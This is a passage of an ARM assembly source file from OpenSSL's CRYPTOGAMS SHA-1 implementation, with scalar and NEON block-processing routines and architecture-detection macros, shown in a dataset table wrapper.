text
stringlengths 2
100k
| meta
dict |
---|---|
@ Copyright 2007-2019 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <[email protected]> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, MAY 2019: Begin defines from taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
# define ARMV7_NEON (1<<0)
@ JW, MAY 2019: End defines from taken from arm_arch.h
@ Back to original Cryptogams code
#if defined(__thumb2__)
.syntax unified
.thumb
#else
.code 32
#endif
.text
.align 5
.globl sha1_block_data_order_ARM
.type sha1_block_data_order_ARM,%function
sha1_block_data_order_ARM:
.Lsha1_block_data_order_ARM:
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r3,pc,#8 @ sha1_block_data_order_ARM
#else
adr r3,.Lsha1_block_data_order_ARM
#endif
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
add r2,r1,r2,lsl#6 @ r2 to point at the end of r1
ldmia r0,{r3,r4,r5,r6,r7}
.Lloop:
ldr r8,.LK_00_19
mov r14,sp
sub sp,sp,#15*4
mov r5,r5,ror#30
mov r6,r6,ror#30
mov r7,r7,ror#30 @ [6]
.L_00_15:
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r7,r8,r7,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r5,r6 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r7,r8,r7,ror#2 @ E+=K_00_19
eor r10,r5,r6 @ F_xx_xx
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r4,r10,ror#2
add r7,r7,r9 @ E+=X[i]
eor r10,r10,r6,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r7,r7,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r6,r8,r6,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r4,r5 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r6,r8,r6,ror#2 @ E+=K_00_19
eor r10,r4,r5 @ F_xx_xx
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r3,r10,ror#2
add r6,r6,r9 @ E+=X[i]
eor r10,r10,r5,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r6,r6,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r5,r8,r5,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r3,r4 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r5,r8,r5,ror#2 @ E+=K_00_19
eor r10,r3,r4 @ F_xx_xx
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r7,r10,ror#2
add r5,r5,r9 @ E+=X[i]
eor r10,r10,r4,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r5,r5,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r4,r8,r4,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r7,r3 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r4,r8,r4,ror#2 @ E+=K_00_19
eor r10,r7,r3 @ F_xx_xx
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r6,r10,ror#2
add r4,r4,r9 @ E+=X[i]
eor r10,r10,r3,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r4,r4,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r3,r8,r3,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r6,r7 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r3,r8,r3,ror#2 @ E+=K_00_19
eor r10,r6,r7 @ F_xx_xx
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r5,r10,ror#2
add r3,r3,r9 @ E+=X[i]
eor r10,r10,r7,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r3,r3,r10 @ E+=F_00_19(B,C,D)
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp
#endif
bne .L_00_15 @ [((11+4)*5+2)*3]
sub sp,sp,#25*4
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r7,r8,r7,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r5,r6 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r7,r8,r7,ror#2 @ E+=K_00_19
eor r10,r5,r6 @ F_xx_xx
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r4,r10,ror#2
add r7,r7,r9 @ E+=X[i]
eor r10,r10,r6,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r7,r7,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r3,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r6,r6,r9 @ E+=X[i]
eor r10,r10,r5,ror#2 @ F_00_19(B,C,D)
add r6,r6,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r7,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r5,r5,r9 @ E+=X[i]
eor r10,r10,r4,ror#2 @ F_00_19(B,C,D)
add r5,r5,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r6,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r4,r4,r9 @ E+=X[i]
eor r10,r10,r3,ror#2 @ F_00_19(B,C,D)
add r4,r4,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r5,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r3,r3,r9 @ E+=X[i]
eor r10,r10,r7,ror#2 @ F_00_19(B,C,D)
add r3,r3,r10 @ E+=F_00_19(B,C,D)
ldr r8,.LK_20_39 @ [+15+16*4]
cmn sp,#0 @ [+3], clear carry to denote 20_39
.L_20_39_or_60_79:
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r7,r8,r7,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r5,r6 @ F_xx_xx
mov r9,r9,ror#31
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r4,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r7,r7,r9 @ E+=X[i]
add r7,r7,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r3,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r6,r6,r9 @ E+=X[i]
add r6,r6,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r7,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r5,r5,r9 @ E+=X[i]
add r5,r5,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r6,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r4,r4,r9 @ E+=X[i]
add r4,r4,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r5,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r3,r3,r9 @ E+=X[i]
add r3,r3,r10 @ E+=F_20_39(B,C,D)
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp @ preserve carry
#endif
bne .L_20_39_or_60_79 @ [+((12+3)*5+2)*4]
bcs .L_done @ [+((12+3)*5+2)*4], spare 300 bytes
ldr r8,.LK_40_59
sub sp,sp,#20*4 @ [+2]
.L_40_59:
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r7,r8,r7,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r5,r6 @ F_xx_xx
mov r9,r9,ror#31
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r4,r10,ror#2 @ F_xx_xx
and r11,r5,r6 @ F_xx_xx
add r7,r7,r9 @ E+=X[i]
add r7,r7,r10 @ E+=F_40_59(B,C,D)
add r7,r7,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r3,r10,ror#2 @ F_xx_xx
and r11,r4,r5 @ F_xx_xx
add r6,r6,r9 @ E+=X[i]
add r6,r6,r10 @ E+=F_40_59(B,C,D)
add r6,r6,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r7,r10,ror#2 @ F_xx_xx
and r11,r3,r4 @ F_xx_xx
add r5,r5,r9 @ E+=X[i]
add r5,r5,r10 @ E+=F_40_59(B,C,D)
add r5,r5,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r6,r10,ror#2 @ F_xx_xx
and r11,r7,r3 @ F_xx_xx
add r4,r4,r9 @ E+=X[i]
add r4,r4,r10 @ E+=F_40_59(B,C,D)
add r4,r4,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r5,r10,ror#2 @ F_xx_xx
and r11,r6,r7 @ F_xx_xx
add r3,r3,r9 @ E+=X[i]
add r3,r3,r10 @ E+=F_40_59(B,C,D)
add r3,r3,r11,ror#2
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp
#endif
bne .L_40_59 @ [+((12+5)*5+2)*4]
ldr r8,.LK_60_79
sub sp,sp,#20*4
cmp sp,#0 @ set carry to denote 60_79
b .L_20_39_or_60_79 @ [+4], spare 300 bytes
.L_done:
add sp,sp,#80*4 @ "deallocate" stack frame
ldmia r0,{r8,r9,r10,r11,r12}
add r3,r8,r3
add r4,r9,r4
add r5,r10,r5,ror#2
add r6,r11,r6,ror#2
add r7,r12,r7,ror#2
stmia r0,{r3,r4,r5,r6,r7}
teq r1,r2
bne .Lloop @ [+18], total 1307
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size sha1_block_data_order_ARM,.-sha1_block_data_order_ARM
.align 5
.LK_00_19:.word 0x5a827999
.LK_20_39:.word 0x6ed9eba1
.LK_40_59:.word 0x8f1bbcdc
.LK_60_79:.word 0xca62c1d6
.align 5
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.globl sha1_block_data_order_neon
.type sha1_block_data_order_neon,%function
.align 4
sha1_block_data_order_neon:
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
add r2,r1,r2,lsl#6 @ r2 to point at the end of r1
@ dmb @ errata #451034 on early Cortex A8
@ vstmdb sp!,{d8-d15} @ ABI specification says so
mov r14,sp
sub r12,sp,#64
adr r8,.LK_00_19
bic r12,r12,#15 @ align for 128-bit stores
ldmia r0,{r3,r4,r5,r6,r7} @ load context
mov sp,r12 @ alloca
vld1.8 {q0,q1},[r1]! @ handles unaligned
veor q15,q15,q15
vld1.8 {q2,q3},[r1]!
vld1.32 {d28[],d29[]},[r8,:32]! @ load K_00_19
vrev32.8 q0,q0 @ yes, even on
vrev32.8 q1,q1 @ big-endian...
vrev32.8 q2,q2
vadd.i32 q8,q0,q14
vrev32.8 q3,q3
vadd.i32 q9,q1,q14
vst1.32 {q8},[r12,:128]!
vadd.i32 q10,q2,q14
vst1.32 {q9},[r12,:128]!
vst1.32 {q10},[r12,:128]!
ldr r9,[sp] @ big RAW stall
.Loop_neon:
vext.8 q8,q0,q1,#8
bic r10,r6,r4
add r7,r7,r9
and r11,r5,r4
vadd.i32 q13,q3,q14
ldr r9,[sp,#4]
add r7,r7,r3,ror#27
vext.8 q12,q3,q15,#4
eor r11,r11,r10
mov r4,r4,ror#2
add r7,r7,r11
veor q8,q8,q0
bic r10,r5,r3
add r6,r6,r9
veor q12,q12,q2
and r11,r4,r3
ldr r9,[sp,#8]
veor q12,q12,q8
add r6,r6,r7,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q13,q15,q12,#4
bic r10,r4,r7
add r5,r5,r9
vadd.i32 q8,q12,q12
and r11,r3,r7
ldr r9,[sp,#12]
vsri.32 q8,q12,#31
add r5,r5,r6,ror#27
eor r11,r11,r10
mov r7,r7,ror#2
vshr.u32 q12,q13,#30
add r5,r5,r11
bic r10,r3,r6
vshl.u32 q13,q13,#2
add r4,r4,r9
and r11,r7,r6
veor q8,q8,q12
ldr r9,[sp,#16]
add r4,r4,r5,ror#27
veor q8,q8,q13
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q9,q1,q2,#8
bic r10,r7,r5
add r3,r3,r9
and r11,r6,r5
vadd.i32 q13,q8,q14
ldr r9,[sp,#20]
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r4,ror#27
vext.8 q12,q8,q15,#4
eor r11,r11,r10
mov r5,r5,ror#2
add r3,r3,r11
veor q9,q9,q1
bic r10,r6,r4
add r7,r7,r9
veor q12,q12,q3
and r11,r5,r4
ldr r9,[sp,#24]
veor q12,q12,q9
add r7,r7,r3,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q13,q15,q12,#4
bic r10,r5,r3
add r6,r6,r9
vadd.i32 q9,q12,q12
and r11,r4,r3
ldr r9,[sp,#28]
vsri.32 q9,q12,#31
add r6,r6,r7,ror#27
eor r11,r11,r10
mov r3,r3,ror#2
vshr.u32 q12,q13,#30
add r6,r6,r11
bic r10,r4,r7
vshl.u32 q13,q13,#2
add r5,r5,r9
and r11,r3,r7
veor q9,q9,q12
ldr r9,[sp,#32]
add r5,r5,r6,ror#27
veor q9,q9,q13
eor r11,r11,r10
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q10,q2,q3,#8
bic r10,r3,r6
add r4,r4,r9
and r11,r7,r6
vadd.i32 q13,q9,q14
ldr r9,[sp,#36]
add r4,r4,r5,ror#27
vext.8 q12,q9,q15,#4
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
veor q10,q10,q2
bic r10,r7,r5
add r3,r3,r9
veor q12,q12,q8
and r11,r6,r5
ldr r9,[sp,#40]
veor q12,q12,q10
add r3,r3,r4,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q13,q15,q12,#4
bic r10,r6,r4
add r7,r7,r9
vadd.i32 q10,q12,q12
and r11,r5,r4
ldr r9,[sp,#44]
vsri.32 q10,q12,#31
add r7,r7,r3,ror#27
eor r11,r11,r10
mov r4,r4,ror#2
vshr.u32 q12,q13,#30
add r7,r7,r11
bic r10,r5,r3
vshl.u32 q13,q13,#2
add r6,r6,r9
and r11,r4,r3
veor q10,q10,q12
ldr r9,[sp,#48]
add r6,r6,r7,ror#27
veor q10,q10,q13
eor r11,r11,r10
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q11,q3,q8,#8
bic r10,r4,r7
add r5,r5,r9
and r11,r3,r7
vadd.i32 q13,q10,q14
ldr r9,[sp,#52]
add r5,r5,r6,ror#27
vext.8 q12,q10,q15,#4
eor r11,r11,r10
mov r7,r7,ror#2
add r5,r5,r11
veor q11,q11,q3
bic r10,r3,r6
add r4,r4,r9
veor q12,q12,q9
and r11,r7,r6
ldr r9,[sp,#56]
veor q12,q12,q11
add r4,r4,r5,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q13,q15,q12,#4
bic r10,r7,r5
add r3,r3,r9
vadd.i32 q11,q12,q12
and r11,r6,r5
ldr r9,[sp,#60]
vsri.32 q11,q12,#31
add r3,r3,r4,ror#27
eor r11,r11,r10
mov r5,r5,ror#2
vshr.u32 q12,q13,#30
add r3,r3,r11
bic r10,r6,r4
vshl.u32 q13,q13,#2
add r7,r7,r9
and r11,r5,r4
veor q11,q11,q12
ldr r9,[sp,#0]
add r7,r7,r3,ror#27
veor q11,q11,q13
eor r11,r11,r10
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q10,q11,#8
bic r10,r5,r3
add r6,r6,r9
and r11,r4,r3
veor q0,q0,q8
ldr r9,[sp,#4]
add r6,r6,r7,ror#27
veor q0,q0,q1
eor r11,r11,r10
mov r3,r3,ror#2
vadd.i32 q13,q11,q14
add r6,r6,r11
bic r10,r4,r7
veor q12,q12,q0
add r5,r5,r9
and r11,r3,r7
vshr.u32 q0,q12,#30
ldr r9,[sp,#8]
add r5,r5,r6,ror#27
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
eor r11,r11,r10
mov r7,r7,ror#2
vsli.32 q0,q12,#2
add r5,r5,r11
bic r10,r3,r6
add r4,r4,r9
and r11,r7,r6
ldr r9,[sp,#12]
add r4,r4,r5,ror#27
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
bic r10,r7,r5
add r3,r3,r9
and r11,r6,r5
ldr r9,[sp,#16]
add r3,r3,r4,ror#27
eor r11,r11,r10
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q11,q0,#8
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#20]
veor q1,q1,q9
eor r11,r10,r5
add r7,r7,r3,ror#27
veor q1,q1,q2
mov r4,r4,ror#2
add r7,r7,r11
vadd.i32 q13,q0,q14
eor r10,r3,r5
add r6,r6,r9
veor q12,q12,q1
ldr r9,[sp,#24]
eor r11,r10,r4
vshr.u32 q1,q12,#30
add r6,r6,r7,ror#27
mov r3,r3,ror#2
vst1.32 {q13},[r12,:128]!
add r6,r6,r11
eor r10,r7,r4
vsli.32 q1,q12,#2
add r5,r5,r9
ldr r9,[sp,#28]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#32]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q12,q0,q1,#8
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#36]
veor q2,q2,q10
eor r11,r10,r6
add r3,r3,r4,ror#27
veor q2,q2,q3
mov r5,r5,ror#2
add r3,r3,r11
vadd.i32 q13,q1,q14
eor r10,r4,r6
vld1.32 {d28[],d29[]},[r8,:32]!
add r7,r7,r9
veor q12,q12,q2
ldr r9,[sp,#40]
eor r11,r10,r5
vshr.u32 q2,q12,#30
add r7,r7,r3,ror#27
mov r4,r4,ror#2
vst1.32 {q13},[r12,:128]!
add r7,r7,r11
eor r10,r3,r5
vsli.32 q2,q12,#2
add r6,r6,r9
ldr r9,[sp,#44]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#48]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q12,q1,q2,#8
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#52]
veor q3,q3,q11
eor r11,r10,r7
add r4,r4,r5,ror#27
veor q3,q3,q8
mov r6,r6,ror#2
add r4,r4,r11
vadd.i32 q13,q2,q14
eor r10,r5,r7
add r3,r3,r9
veor q12,q12,q3
ldr r9,[sp,#56]
eor r11,r10,r6
vshr.u32 q3,q12,#30
add r3,r3,r4,ror#27
mov r5,r5,ror#2
vst1.32 {q13},[r12,:128]!
add r3,r3,r11
eor r10,r4,r6
vsli.32 q3,q12,#2
add r7,r7,r9
ldr r9,[sp,#60]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#0]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q12,q2,q3,#8
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#4]
veor q8,q8,q0
eor r11,r10,r3
add r5,r5,r6,ror#27
veor q8,q8,q9
mov r7,r7,ror#2
add r5,r5,r11
vadd.i32 q13,q3,q14
eor r10,r6,r3
add r4,r4,r9
veor q12,q12,q8
ldr r9,[sp,#8]
eor r11,r10,r7
vshr.u32 q8,q12,#30
add r4,r4,r5,ror#27
mov r6,r6,ror#2
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
add r4,r4,r11
eor r10,r5,r7
vsli.32 q8,q12,#2
add r3,r3,r9
ldr r9,[sp,#12]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#16]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
